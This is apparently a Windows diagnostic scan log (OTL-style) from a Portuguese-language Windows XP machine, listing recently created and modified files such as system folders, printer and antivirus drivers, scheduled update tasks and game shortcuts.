[2013/05/27 19:44:05 | 000,029,184 | ---- | C] (Ricoh Co., Ltd.) -- C:\WINDOWS\System32\dllcache\rw330ext.dll
[2013/05/27 19:43:30 | 000,054,528 | ---- | C] (Philips Semiconductors GmbH) -- C:\WINDOWS\System32\dllcache\cap7146.sys
[2013/05/27 19:43:15 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xircom
[2013/05/27 19:43:15 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\xerox
[2013/05/27 19:43:15 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\microsoft frontpage
[2013/05/27 19:42:30 | 000,000,000 | -HSD | C] -- C:\Documents and Settings\All Users\DRM
[2013/05/27 19:42:20 | 000,000,000 | -H-D | C] -- C:\Arquivos de programas\WindowsUpdate
[2013/05/27 19:42:17 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Serviços on-line
[2013/05/27 19:42:05 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\DirectX
[2013/05/27 19:41:47 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Serviços
[2013/05/27 19:41:45 | 000,000,000 | --SD | C] -- C:\WINDOWS\Tasks
[2013/05/27 19:41:44 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\MSSoap
[2013/05/27 19:41:40 | 000,000,000 | ---D | C] -- C:\WINDOWS\srchasst
[2013/05/27 19:41:39 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Macromed
[2013/05/27 19:41:32 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Movie Maker
[2013/05/27 19:41:13 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Restore
[2013/05/27 19:41:09 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\NetMeeting
[2013/05/27 19:41:05 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Outlook Express
[2013/05/27 19:40:59 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\System
[2013/05/27 19:40:58 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Internet Explorer
[2013/05/27 19:40:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documentos\Minhas imagens
[2013/05/27 19:40:41 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Jogos
[2013/05/27 19:40:32 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\ComPlus Applications
[2013/05/27 19:40:27 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Ferramentas administrativas
[2013/05/27 19:40:27 | 000,000,000 | ---D | C] -- C:\WINDOWS\Registration
[2013/05/27 19:40:21 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documentos\Minhas músicas
[2013/05/27 19:40:21 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Windows Media Player
[2013/05/27 19:40:16 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Messenger
[2013/05/27 19:40:12 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\MSN Gaming Zone
[2013/05/27 19:39:51 | 000,283,648 | ---- | C] (Cinematronics) -- C:\WINDOWS\System32\dllcache\pinball.exe
[2013/05/27 19:39:49 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Windows NT
[2013/05/27 19:39:45 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\MsDtc
[2013/05/27 19:39:43 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Com
[2013/05/27 19:39:31 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documentos\Meus vídeos
[2013/05/27 19:39:13 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Acessórios
[2013/05/27 16:30:22 | 000,000,000 | -HSD | C] -- C:\WINDOWS\Installer
[2013/05/27 16:30:22 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\ODBC
[2013/05/27 16:30:20 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\SpeechEngines
[2013/05/27 16:30:19 | 000,000,000 | R--D | C] -- C:\Arquivos de programas
[2013/05/27 16:30:19 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns\Microsoft Shared
[2013/05/27 16:30:19 | 000,000,000 | ---D | C] -- C:\Arquivos de programas\Arquivos comuns
[2013/05/27 16:29:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Menu Iniciar
[2013/05/27 16:29:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Inicializar
[2013/05/27 16:29:57 | 000,000,000 | R--D | C] -- C:\Documents and Settings\All Users\Documentos
[2013/05/27 16:29:57 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Modelos
[2013/05/27 16:29:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Favoritos
[2013/05/27 16:29:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Desktop
[2013/05/27 16:29:49 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CatRoot2
[2013/05/27 16:29:49 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\CatRoot
[2013/05/27 16:29:44 | 000,000,000 | --SD | C] -- C:\Documents and Settings\All Users\Dados de aplicativos\Microsoft
[2013/05/27 16:29:44 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\All Users\Dados de aplicativos
[2013/05/27 16:29:26 | 000,000,000 | -HSD | C] -- C:\System Volume Information
[2013/05/27 16:29:26 | 000,000,000 | ---D | C] -- C:\Documents and Settings
[2013/05/27 16:25:01 | 000,000,000 | --SD | C] -- C:\WINDOWS\Downloaded Program Files
[2013/05/27 16:25:01 | 000,000,000 | R-SD | C] -- C:\WINDOWS\Fonts
[2013/05/27 16:25:01 | 000,000,000 | RHSD | C] -- C:\WINDOWS\System32\dllcache
[2013/05/27 16:25:01 | 000,000,000 | R--D | C] -- C:\WINDOWS\Web
[2013/05/27 16:25:01 | 000,000,000 | -H-D | C] -- C:\WINDOWS\inf
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\WinSxS
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\wins
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\WBEM
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\wbem
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\usmt
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\twain_32
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Temp
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\system32
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\system
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\spool
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ShellExt
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\Setup
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\security
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Resources
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\repair
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ras
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\pt-BR
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Provisioning
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\PeerNet
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\pchealth
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\oobe
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Offline Web Pages
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\npp
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\NLDRV
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Network Diagnostic
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\mui
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\mui
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\msapps
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\msagent
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Media
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\L2Schemas
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\java
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\inetsrv
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\IME
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\ime
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\icsxml
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\ias
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Help
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\export
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers\etc
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\ehome
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Driver Cache
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\drivers\disdn
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\dhcp
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Debug
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Cursors
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Connection Wizard
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\config
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\Config
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\AppPatch
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\addins
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\3com_dmi
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\3076
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\2052
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1054
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1046
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1042
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1041
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1037
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1033
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1031
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1028
[2013/05/27 16:25:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\1025
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
========== Files - Modified Within 30 Days ==========
[2013/06/14 11:28:00 | 000,001,074 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/06/14 09:32:00 | 000,000,334 | -H-- | M] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/06/14 02:47:58 | 000,007,394 | ---- | M] () -- C:\WINDOWS\System32\nvAppTimestamps
[2013/06/13 20:28:00 | 000,001,070 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/06/13 13:47:38 | 000,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2013/06/13 13:45:29 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2013/06/10 22:26:56 | 000,128,622 | ---- | M] () -- C:\Documents and Settings\Matheus\Meus documentos\DESENHO N°1 PLANTA.dwg
[2013/06/10 22:24:54 | 000,128,675 | ---- | M] () -- C:\Documents and Settings\Matheus\Meus documentos\DESENHO N°1 PLANTA.bak
[2013/06/07 18:39:50 | 000,394,368 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2013/06/07 17:05:49 | 000,002,020 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Autodesk Inventor Professional 2012.lnk
[2013/06/07 13:15:21 | 000,001,876 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Inventor Fusion 2012.lnk
[2013/06/07 13:10:35 | 000,000,155 | ---- | M] () -- C:\Documents and Settings\All Users\Dados de aplicativos\Microsoft.SqlServer.Compact.351.32.bc
[2013/06/07 13:09:38 | 000,001,988 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\AutoCAD Mechanical 2012.lnk
[2013/06/07 13:04:32 | 000,541,542 | ---- | M] () -- C:\WINDOWS\System32\perfh016.dat
[2013/06/07 13:04:32 | 000,501,856 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2013/06/07 13:04:32 | 000,099,300 | ---- | M] () -- C:\WINDOWS\System32\perfc016.dat
[2013/06/07 13:04:32 | 000,087,866 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2013/06/07 12:36:04 | 000,003,584 | ---- | M] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/06/07 01:26:41 | 000,054,036 | -H-- | M] () -- C:\WINDOWS\System32\mlfcache.dat
[2013/06/05 22:30:07 | 000,001,885 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/06/02 21:59:21 | 000,000,224 | ---- | M] () -- C:\Documents and Settings\Matheus\Desktop\Don't Starve.url
[2013/06/02 19:21:58 | 000,001,616 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Jogar League Of Legends.lnk
[2013/06/02 18:25:05 | 000,000,224 | ---- | M] () -- C:\Documents and Settings\Matheus\Desktop\MicroVolts.url
[2013/06/02 18:03:19 | 000,000,720 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Steam.lnk
[2013/06/02 17:54:07 | 000,000,544 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\terra.lnk
[2013/05/29 21:39:17 | 000,186,643 | ---- | M] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\census.cache
[2013/05/29 21:39:14 | 000,172,691 | ---- | M] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\ars.cache
[2013/05/29 21:27:04 | 000,000,036 | ---- | M] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\housecall.guid.cache
[2013/05/27 21:49:38 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb
[2013/05/27 21:49:38 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb
[2013/05/27 21:48:38 | 000,000,000 | -H-- | M] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2013/05/27 21:32:41 | 000,002,969 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/05/27 20:40:31 | 001,091,636 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb0.bin
[2013/05/27 20:40:31 | 000,000,001 | ---- | M] () -- C:\WINDOWS\System32\nvdrssel.bin
[2013/05/27 20:40:29 | 001,091,636 | ---- | M] () -- C:\WINDOWS\System32\nvdrsdb1.bin
[2013/05/27 20:40:29 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\nvdrswr.lk
[2013/05/27 19:44:20 | 000,000,261 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf
[2013/05/27 19:43:05 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2013/05/27 19:43:05 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2013/05/27 19:43:05 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2013/05/27 19:43:05 | 000,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT
[2013/05/27 19:43:03 | 000,316,640 | ---- | M] () -- C:\WINDOWS\WMSysPr9.prx
[2013/05/27 19:42:55 | 000,004,205 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI
[2013/05/27 19:40:40 | 000,021,844 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat
[2013/05/27 19:38:53 | 000,000,211 | -HS- | M] () -- C:\boot.ini
[2013/05/27 16:38:09 | 000,004,444 | ---- | M] () -- C:\WINDOWS\System32\pid.PNF
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
========== Files Created - No Company Name ==========
[2013/06/10 21:17:16 | 000,128,675 | ---- | C] () -- C:\Documents and Settings\Matheus\Meus documentos\DESENHO N°1 PLANTA.bak
[2013/06/10 21:17:16 | 000,128,622 | ---- | C] () -- C:\Documents and Settings\Matheus\Meus documentos\DESENHO N°1 PLANTA.dwg
[2013/06/07 18:38:58 | 000,681,798 | ---- | C] () -- C:\Documents and Settings\LocalService\Configurações locais\Dados de aplicativos\WPFFontCache_v0400-S-1-5-21-299502267-1644491937-682003330-1003-0.dat
[2013/06/07 18:38:58 | 000,305,000 | ---- | C] () -- C:\Documents and Settings\LocalService\Configurações locais\Dados de aplicativos\FontCache3.0.0.0.dat
[2013/06/07 17:05:49 | 000,002,020 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Autodesk Inventor Professional 2012.lnk
[2013/06/07 13:15:21 | 000,001,876 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Inventor Fusion 2012.lnk
[2013/06/07 13:10:35 | 000,000,155 | ---- | C] () -- C:\Documents and Settings\All Users\Dados de aplicativos\Microsoft.SqlServer.Compact.351.32.bc
[2013/06/07 13:09:38 | 000,001,988 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\AutoCAD Mechanical 2012.lnk
[2013/06/07 12:36:04 | 000,003,584 | ---- | C] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/06/07 01:26:41 | 000,054,036 | -H-- | C] () -- C:\WINDOWS\System32\mlfcache.dat
[2013/06/02 21:59:21 | 000,000,224 | ---- | C] () -- C:\Documents and Settings\Matheus\Desktop\Don't Starve.url
[2013/06/02 19:21:58 | 000,001,616 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Jogar League Of Legends.lnk
[2013/06/02 18:58:29 | 000,348,846 | ---- | C] () -- C:\Documents and Settings\LocalService\Configurações locais\Dados de aplicativos\WPFFontCache_v0400-System.dat
[2013/06/02 18:52:23 | 000,024,772 | ---- | C] () -- C:\WINDOWS\System32\M1120DEF.css
[2013/06/02 18:52:23 | 000,021,540 | ---- | C] () -- C:\WINDOWS\System32\ZSUM1120.ent
[2013/06/02 18:52:23 | 000,017,938 | ---- | C] () -- C:\WINDOWS\System32\ZSDM1120.chm
[2013/06/02 18:52:23 | 000,009,731 | ---- | C] () -- C:\WINDOWS\System32\M1120BTN.js
[2013/06/02 18:52:23 | 000,008,085 | ---- | C] () -- C:\WINDOWS\System32\M1120GLB.js
[2013/06/02 18:52:23 | 000,004,324 | ---- | C] () -- C:\WINDOWS\System32\M1120OS.htm
[2013/06/02 18:52:23 | 000,002,944 | ---- | C] () -- C:\WINDOWS\System32\M1120SIG.gif
[2013/06/02 18:52:23 | 000,002,791 | ---- | C] () -- C:\WINDOWS\System32\ZSDM1120.SDD
[2013/06/02 18:52:23 | 000,000,640 | ---- | C] () -- C:\WINDOWS\System32\ZSDM1120.UNZ
[2013/06/02 18:52:23 | 000,000,049 | ---- | C] () -- C:\WINDOWS\System32\ZSUM1120.VER
[2013/06/02 18:48:01 | 000,413,696 | ---- | C] () -- C:\WINDOWS\System32\ZSM1120.exe
[2013/06/02 18:48:01 | 000,004,324 | ---- | C] () -- C:\WINDOWS\M1120OS.htm
[2013/06/02 18:48:00 | 000,167,936 | ---- | C] () -- C:\WINDOWS\System32\hpsfs.dll
[2013/06/02 18:48:00 | 000,024,772 | ---- | C] () -- C:\WINDOWS\M1120DEF.css
[2013/06/02 18:48:00 | 000,009,731 | ---- | C] () -- C:\WINDOWS\M1120BTN.js
[2013/06/02 18:48:00 | 000,008,085 | ---- | C] () -- C:\WINDOWS\M1120GLB.js
[2013/06/02 18:48:00 | 000,002,944 | ---- | C] () -- C:\WINDOWS\M1120SIG.gif
[2013/06/02 18:25:05 | 000,000,224 | ---- | C] () -- C:\Documents and Settings\Matheus\Desktop\MicroVolts.url
[2013/06/02 18:18:11 | 000,650,752 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
[2013/06/02 18:18:11 | 000,243,200 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll
[2013/06/02 18:18:08 | 000,079,872 | ---- | C] () -- C:\WINDOWS\System32\ff_vfw.dll
[2013/06/02 18:03:19 | 000,000,720 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Steam.lnk
[2013/06/02 17:54:07 | 000,000,544 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\terra.lnk
[2013/05/29 21:39:17 | 000,186,643 | ---- | C] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\census.cache
[2013/05/29 21:39:14 | 000,172,691 | ---- | C] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\ars.cache
[2013/05/29 21:27:04 | 000,000,036 | ---- | C] () -- C:\Documents and Settings\Matheus\Configurações locais\Dados de aplicativos\housecall.guid.cache
[2013/05/28 19:01:14 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\iacenc.dll
[2013/05/28 19:01:14 | 000,003,072 | ---- | C] () -- C:\WINDOWS\System32\dllcache\iacenc.dll
[2013/05/27 21:48:38 | 000,000,000 | -H-- | C] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2013/05/27 21:45:06 | 000,001,804 | ---- | C] () -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Adobe Reader 9.lnk
[2013/05/27 21:43:27 | 000,008,192 | ---- | C] () -- C:\WINDOWS\System32\srvany.exe
[2013/05/27 21:32:42 | 000,174,664 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswVmm.sys
[2013/05/27 21:32:42 | 000,049,376 | ---- | C] () -- C:\WINDOWS\System32\drivers\aswRvrt.sys
[2013/05/27 21:32:41 | 000,000,334 | -H-- | C] () -- C:\WINDOWS\tasks\avast! Emergency Update.job
[2013/05/27 20:45:04 | 000,007,394 | ---- | C] () -- C:\WINDOWS\System32\nvAppTimestamps
[2013/05/27 20:40:29 | 001,091,636 | ---- | C] () -- C:\WINDOWS\System32\nvdrsdb1.bin
[2013/05/27 20:40:29 | 001,091,636 | ---- | C] () -- C:\WINDOWS\System32\nvdrsdb0.bin
[2013/05/27 20:40:29 | 000,000,001 | ---- | C] () -- C:\WINDOWS\System32\nvdrssel.bin
[2013/05/27 20:40:29 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\nvdrswr.lk
[2013/05/27 20:35:08 | 002,288,168 | ---- | C] () -- C:\WINDOWS\System32\nvdata.data
[2013/05/27 20:35:08 | 000,017,363 | ---- | C] () -- C:\WINDOWS\System32\nvinfo.pb
[2013/05/27 20:24:31 | 000,001,885 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
[2013/05/27 20:23:30 | 000,001,074 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2013/05/27 20:23:29 | 000,001,070 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2013/05/27 20:17:17 | 000,000,911 | ---- | C] () -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\HD ADeck.lnk
[2013/05/27 20:17:03 | 000,254,000 | R--- | C] ( ) -- C:\WINDOWS\System32\Audio3D.dll
[2013/05/27 20:17:03 | 000,254,000 | R--- | C] ( ) -- C:\WINDOWS\System32\A3D.dll
[2013/05/27 20:17:03 | 000,254,000 | ---- | C] ( ) -- C:\WINDOWS\System32\dllcache\a3d.dll
[2013/05/27 20:12:55 | 000,008,192 | R--- | C] () -- C:\WINDOWS\System32\drivers\IntelMEFWVer.dll
[2013/05/27 19:46:04 | 000,000,843 | ---- | C] () -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Internet Explorer.lnk
[2013/05/27 19:45:59 | 000,000,778 | ---- | C] () -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Outlook Express.lnk
[2013/05/27 19:45:54 | 000,001,599 | ---- | C] () -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Assistência remota.lnk
[2013/05/27 19:45:54 | 000,000,828 | ---- | C] () -- C:\Documents and Settings\Matheus\Menu Iniciar\Programas\Windows Media Player.lnk
[2013/05/27 19:44:20 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/05/27 19:44:02 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\pintlcsa.dll
[2013/05/27 19:43:54 | 001,158,818 | ---- | C] () -- C:\WINDOWS\System32\dllcache\korwbrkr.lex
[2013/05/27 19:43:51 | 000,059,392 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imscinst.exe
[2013/05/27 19:43:50 | 000,196,665 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imjpinst.exe
[2013/05/27 19:43:49 | 000,134,339 | ---- | C] () -- C:\WINDOWS\System32\dllcache\imekr.lex
[2013/05/27 19:43:43 | 013,463,552 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hwxjpn.dll
[2013/05/27 19:43:39 | 000,108,827 | ---- | C] () -- C:\WINDOWS\System32\dllcache\hanja.lex
[2013/05/27 19:43:37 | 000,094,208 | ---- | C] () -- C:\WINDOWS\System32\dllcache\fpencode.dll
[2013/05/27 19:43:31 | 000,173,568 | ---- | C] () -- C:\WINDOWS\System32\dllcache\chtskf.dll
[2013/05/27 19:43:05 | 000,002,969 | ---- | C] () -- C:\WINDOWS\System32\CONFIG.NT
[2013/05/27 19:43:05 | 000,000,000 | RHS- | C] () -- C:\MSDOS.SYS
[2013/05/27 19:43:05 | 000,000,000 | RHS- | C] () -- C:\IO.SYS
[2013/05/27 19:43:05 | 000,000,000 | ---- | C] () -- C:\CONFIG.SYS
[2013/05/27 19:43:05 | 000,000,000 | ---- | C] () -- C:\AUTOEXEC.BAT
[2013/05/27 19:43:03 | 000,023,392 | ---- | C] () -- C:\WINDOWS\System32\nscompat.tlb
[2013/05/27 19:43:03 | 000,016,832 | ---- | C] () -- C:\WINDOWS\System32\amcompat.tlb
[2013/05/27 19:43:02 | 000,316,640 | ---- | C] () -- C:\WINDOWS\WMSysPr9.prx
[2013/05/27 19:42:19 | 000,000,842 | ---- | C] () -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Windows Movie Maker.lnk
[2013/05/27 19:42:10 | 004,399,505 | ---- | C] () -- C:\WINDOWS\System32\dllcache\nls302en.lex
[2013/05/27 19:41:55 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt256.bmp
[2013/05/27 19:41:55 | 000,048,680 | -HS- | C] () -- C:\WINDOWS\winnt.bmp
[2013/05/27 19:41:50 | 000,000,984 | ---- | C] () -- C:\WINDOWS\System32\dllcache\srframe.mmf
[2013/05/27 19:41:15 | 000,381,440 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msinfo.dll
[2013/05/27 19:40:41 | 000,000,619 | ---- | C] () -- C:\Documents and Settings\All Users\Menu Iniciar\Programas\Windows Messenger.lnk
[2013/05/27 19:40:40 | 000,021,844 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2013/05/27 19:40:01 | 000,009,522 | ---- | C] () -- C:\WINDOWS\Tapete.bmp
[2013/05/27 19:40:00 | 000,065,978 | ---- | C] () -- C:\WINDOWS\Bolhas de sabão.bmp
[2013/05/27 19:40:00 | 000,065,954 | ---- | C] () -- C:\WINDOWS\Bruma.bmp
[2013/05/27 19:40:00 | 000,065,832 | ---- | C] () -- C:\WINDOWS\Deserto.bmp
[2013/05/27 19:40:00 | 000,026,680 | ---- | C] () -- C:\WINDOWS\Leques.bmp
[2013/05/27 19:40:00 | 000,026,582 | ---- | C] () -- C:\WINDOWS\Areia.bmp
[2013/05/27 19:40:00 | 000,017,362 | ---- | C] () -- C:\WINDOWS\Rododentro.bmp
[2013/05/27 19:40:00 | 000,017,336 | ---- | C] () -- C:\WINDOWS\Pescaria.bmp
